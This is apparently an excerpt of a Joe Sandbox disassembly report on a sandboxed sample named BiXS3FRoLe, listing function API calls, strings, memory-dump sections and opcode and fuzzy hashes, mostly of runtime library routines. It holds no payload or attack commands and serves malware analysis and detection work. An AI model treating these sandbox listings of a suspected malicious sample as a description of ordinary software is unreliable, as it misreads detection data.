                                                                                                        • Opcode ID: 7ae35b89d8bb1424ff0aa70826700627fe1c9caa147be819384c67f40700ab89
                                                                                                        • Instruction ID: 273abc4a8b7f86220309ec346fd5d0c0a20a3c4219f836649cd72a970d0bea45
                                                                                                        • Opcode Fuzzy Hash: 7ae35b89d8bb1424ff0aa70826700627fe1c9caa147be819384c67f40700ab89
                                                                                                        • Instruction Fuzzy Hash: 06F0D6725147117B8734EB64F4C5C2A73E9EB45B50FB40895F045D7661CB34FD808769
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00B0249C
                                                                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00B024BC
                                                                                                          • Part of subcall function 00B01D2D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B01D4F
                                                                                                          • Part of subcall function 00B01D2D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00B01D70
                                                                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00B024CF
                                                                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00B024DB
                                                                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00B024E4
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                        • String ID:
                                                                                                        • API String ID: 1236927926-0
                                                                                                        • Opcode ID: 8863e50ab0341dd84d67681ce1d2ce7963d46c9f48f78b945e469889fc5a281d
                                                                                                        • Instruction ID: 982af9f5720eefc573a3494b84adc19448e85fda83b10827415437db07b8b820
                                                                                                        • Opcode Fuzzy Hash: 8863e50ab0341dd84d67681ce1d2ce7963d46c9f48f78b945e469889fc5a281d
                                                                                                        • Instruction Fuzzy Hash: E7F02430600304A7CF187BBC088A6AD3EDA5F95350B5881E8FA126F3C1DE708D0892A0
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B302B0
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B302C2
                                                                                                        • _free.LIBCMT ref: 00B302D5
                                                                                                        • _free.LIBCMT ref: 00B302E6
                                                                                                        • _free.LIBCMT ref: 00B302F7
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 31a9a72107b8c9a38953d0d8390965099a5ab202f6e413de3ea67c60200d8a4d
                                                                                                        • Instruction ID: 3bad8f0db4e7d0420943e1140c5c31e6266f4c118e3c87839fd04d6485110238
                                                                                                        • Opcode Fuzzy Hash: 31a9a72107b8c9a38953d0d8390965099a5ab202f6e413de3ea67c60200d8a4d
                                                                                                        • Instruction Fuzzy Hash: E5F03A75804221ABDB61AF28FD224553BE0FB0676076041AFF424532B1CF391E01CBC8
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0D8E
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0DF9
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name
                                                                                                        • String ID: ThisPointer:$ValueNames
                                                                                                        • API String ID: 1734802720-2375088429
                                                                                                        • Opcode ID: 1d4892fe9ac9f6e190567795b191ca4e29dd4cf12642f1b44028d1e73501f0ee
                                                                                                        • Instruction ID: 174a4c1b5adec9d3256555bd1f77c81ceed7ce4fcf462628585ac1a735a42153
                                                                                                        • Opcode Fuzzy Hash: 1d4892fe9ac9f6e190567795b191ca4e29dd4cf12642f1b44028d1e73501f0ee
                                                                                                        • Instruction Fuzzy Hash: 8551D3312043405FCB209F748C91F67BBE6AF59744F448CAEE5CA87352DB62E908C761
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0B9E
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD0C09
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name
                                                                                                        • String ID: ThisPointer:$ValueNames
                                                                                                        • API String ID: 1734802720-2375088429
                                                                                                        • Opcode ID: 3a0d46bcc6e9ad5c6d9b4922d43b3010e70ecece929714465aa0c15ef7208e4a
                                                                                                        • Instruction ID: ec9642644c6316ff822f263359191dfe96409d570e9c02614b8fe08a3eef2eeb
                                                                                                        • Opcode Fuzzy Hash: 3a0d46bcc6e9ad5c6d9b4922d43b3010e70ecece929714465aa0c15ef7208e4a
                                                                                                        • Instruction Fuzzy Hash: F251E1313183409FCB209F248D91F67BBE5AF55708F4489AEE9CA87352DB62E908C761
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD72F
                                                                                                        Strings
                                                                                                        • TruncatedDigestSize, xrefs: 00ABD779
                                                                                                        • PutMessage, xrefs: 00ABD756
                                                                                                        • FilterWithBufferedInput: invalid buffer size, xrefs: 00ABD706
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
                                                                                                        • API String ID: 2005118841-3547780871
                                                                                                        • Opcode ID: 78d7a0fd6cb82ae95c2c6be57eb5d62bc6fcada4a3a5c0b287bd70c68b6f03ac
                                                                                                        • Instruction ID: 48d72518958ad07fd18ae686c8cc4543266c762ebd5ef5d49fa830c192bb5642
                                                                                                        • Opcode Fuzzy Hash: 78d7a0fd6cb82ae95c2c6be57eb5d62bc6fcada4a3a5c0b287bd70c68b6f03ac
                                                                                                        • Instruction Fuzzy Hash: 3031E471600205AFCB14DF54CC95EEAB7F8FF58720F0046AAF41597691DB70E909CB90
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A75EAB
                                                                                                        Strings
                                                                                                        • ', stored ', xrefs: 00A75AF2
                                                                                                        • NameValuePairs: type mismatch for ', xrefs: 00A75AD2
                                                                                                        • ', trying to retrieve ', xrefs: 00A75B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                                                                                                        • API String ID: 2005118841-3022120042
                                                                                                        • Opcode ID: 9354ea2cb425003da41502ce03f31bcd62476db76b1f68116db6c7d9bb4ad9e6
                                                                                                        • Instruction ID: a61387f465210481b58052176421ebc82eeb8e563eeab835a1c535d86108f2ef
                                                                                                        • Opcode Fuzzy Hash: 9354ea2cb425003da41502ce03f31bcd62476db76b1f68116db6c7d9bb4ad9e6
                                                                                                        • Instruction Fuzzy Hash: 5011947290460CABCB10EF94DD41FCAB7FCEB05754F1085A6FD15A3690EB75AA08C7A0
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00B443D0
                                                                                                        • make_shared.LIBCPMT ref: 00B4441B
                                                                                                          • Part of subcall function 00B440B0: __EH_prolog3.LIBCMT ref: 00B440B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3H_prolog3_catchmake_shared
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 1798871530-2084237596
                                                                                                        • Opcode ID: b4ef2cc1f5d764c8c967561998ba01fd5100acc2f75b206942d14bb30c8e34e6
                                                                                                        • Instruction ID: 8898213a98888faad48442716249a118377f6f00a38d48c1dda1491e9781036f
                                                                                                        • Opcode Fuzzy Hash: b4ef2cc1f5d764c8c967561998ba01fd5100acc2f75b206942d14bb30c8e34e6
                                                                                                        • Instruction Fuzzy Hash: CFF03C70644168CFCB11AF68D4526AC3AF0EF56B00B9544E1F8014B325CF785F969BA2
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B06163
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B06171
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler$version
                                                                                                        • API String ID: 1687795959-3154422776
                                                                                                        • Opcode ID: b87ad0ae0476955de4e8397a68309d81e1a5e89bc7f8b029e3af338febc7dc95
                                                                                                        • Instruction ID: 67a3260c9ee4e3023673cdc61b56c5608a5a54ba56aedcc409e2467b47d1c55f
                                                                                                        • Opcode Fuzzy Hash: b87ad0ae0476955de4e8397a68309d81e1a5e89bc7f8b029e3af338febc7dc95
                                                                                                        • Instruction Fuzzy Hash: C5E08634A44208B6CF11FA60C84AFEC7BE8AB14709F0080D1BA11210E197B49699C641
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,Dflt,00B19233,?,00B899F0,?,?,?,?,?,?,?), ref: 00B1A308
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B1A316
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00B1A31F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Value___vcrt_
                                                                                                        • String ID: Dflt
                                                                                                        • API String ID: 483936075-3880269418
                                                                                                        • Opcode ID: ee9c3342f70d76dbefe1e197518fad486956a5dd7fbc1b0c75967f34584e07fd
                                                                                                        • Instruction ID: 74818945748a61eb6b601d708442fd1b89cd9297fe0955d44e6b8a7b0cf00d46
                                                                                                        • Opcode Fuzzy Hash: ee9c3342f70d76dbefe1e197518fad486956a5dd7fbc1b0c75967f34584e07fd
                                                                                                        • Instruction Fuzzy Hash: B1D01236615322578A105B74FC0D6E637E6E6D177331447B1F120C31E4DF7894469750
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 0bbad52a81ebf957d6498de7c6c4cd56ac8fac2dd9ce91af280b7e57b28347ed
                                                                                                        • Instruction ID: 00064d9d622b611deb7761e81cfa435c38c6466ae704f6f287eb4fe2a3671aba
                                                                                                        • Opcode Fuzzy Hash: 0bbad52a81ebf957d6498de7c6c4cd56ac8fac2dd9ce91af280b7e57b28347ed
                                                                                                        • Instruction Fuzzy Hash: 34A14772A04796AFEB25CF28C8D27AEBBE5EF11350F3881E9E4859B281C6349D45C750
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: f6463ed2d263c865f88dc73b718fc27aacde4cf89c1c4745935ee87d954df6b4
                                                                                                        • Instruction ID: bdc6a840d52966cbe30d813283785bf0404d0b296e434ada0d8de0f8a20a00ae
                                                                                                        • Opcode Fuzzy Hash: f6463ed2d263c865f88dc73b718fc27aacde4cf89c1c4745935ee87d954df6b4
                                                                                                        • Instruction Fuzzy Hash: D2B15975D002899FCF14DFA9C985AEEBBB9FF08320F144059F845AB251D734AE46CBA0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: 458984adba9e6b59963ae660a7729760e6c985ca2942790f08b40c3ca312e05f
                                                                                                        • Instruction ID: a2f078941fb44d46b481a2669b806de9598847a1f28ce4889071b553015b0966
                                                                                                        • Opcode Fuzzy Hash: 458984adba9e6b59963ae660a7729760e6c985ca2942790f08b40c3ca312e05f
                                                                                                        • Instruction Fuzzy Hash: 95B17875D0028D9FDF10DFA9C985AEEBBB9FF48320F144159E805AB201D730AE46CBA1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: 9739309195843d47bb6fb900082424f09a8a5f9f3dd4ac435ed331798c7199be
                                                                                                        • Instruction ID: a726768fb6ed7a9c2b8ce4855984d4394170fabbdb2f4a1eecbe69b37d4b9769
                                                                                                        • Opcode Fuzzy Hash: 9739309195843d47bb6fb900082424f09a8a5f9f3dd4ac435ed331798c7199be
                                                                                                        • Instruction Fuzzy Hash: 13B1ADB1D00689DFDF10DFA9D985AEEBBB9FF08304F244559E805AB211D770AE45CBA0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 73684ac790696b2e46f6e5c5bdda7655b4735602fc4fc2a17bbe08c2c7e73f99
                                                                                                        • Instruction ID: c6bebc0eebf9cb15858e8d672e188c6b1963c01003c901c539be8d93811ff0bd
                                                                                                        • Opcode Fuzzy Hash: 73684ac790696b2e46f6e5c5bdda7655b4735602fc4fc2a17bbe08c2c7e73f99
                                                                                                        • Instruction Fuzzy Hash: 7B5101B26066029FDB299F54D885BFA77E4EF14310FA441ADE80687290DBB1FCC1D792
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EqualOffsetTypeids
                                                                                                        • String ID:
                                                                                                        • API String ID: 1707706676-0
                                                                                                        • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                        • Instruction ID: 3c4e8c9a9e234beafe7b5864c5619e68395aa09aaf49525234d928176200dcbc
                                                                                                        • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                        • Instruction Fuzzy Hash: 6F518B36A042099FCF11CF68D4809EEBBF5FF15310F9448DAD855A7291DB32AE85CB90
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B05976
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                        • String ID:
                                                                                                        • API String ID: 3433162309-0
                                                                                                        • Opcode ID: c38975d1eaeb179f885bba939cb71da8ca37310a58839547d4482114b0546577
                                                                                                        • Instruction ID: 0adb5f746ad569646aec424cbbbc0e9ef8101d9a2cd6f29a978d806de470be76
                                                                                                        • Opcode Fuzzy Hash: c38975d1eaeb179f885bba939cb71da8ca37310a58839547d4482114b0546577
                                                                                                        • Instruction Fuzzy Hash: 7C311575A00709DFCB20DF94C4C4AAE7BF9FB44314F1405EAE945AB686D630AA45DFA0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AFFCB0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000,AE695AF0,AE695AF0), ref: 00AFFCF5
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,AE695AF0,?,AE695AF0,AE695AF0,?,00B4BF00,000000FF,?,00AFFD89), ref: 00B000A0
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00AFFD89), ref: 00B000C1
                                                                                                        • CloseHandle.KERNEL32(?,?,AE695AF0,AE695AF0), ref: 00B000F2
                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B50140,000000FF), ref: 00B0012C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 568734227-0
                                                                                                        • Opcode ID: c70e8e0570af623b87c7afd93f91026f60e82170cef1b80e0c1a436e85bbe739
                                                                                                        • Instruction ID: a982ddc269bdfb4326b4b41cebb1901d063e092624c2b235b23754d004d2615c
                                                                                                        • Opcode Fuzzy Hash: c70e8e0570af623b87c7afd93f91026f60e82170cef1b80e0c1a436e85bbe739
                                                                                                        • Instruction Fuzzy Hash: A531BD306403099FDB10EF68C884B26BBE8FB04724F1445A9EC18DB296DB36DD15CB90
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(00B987E8,?,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0075A
                                                                                                        • LeaveCriticalSection.KERNEL32(00B987E8,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0078D
                                                                                                        • SetEvent.KERNEL32(00000000,00B97168,00B51FF0,00000001), ref: 00B0081B
                                                                                                        • ResetEvent.KERNEL32 ref: 00B00827
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3553466030-0
                                                                                                        • Opcode ID: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
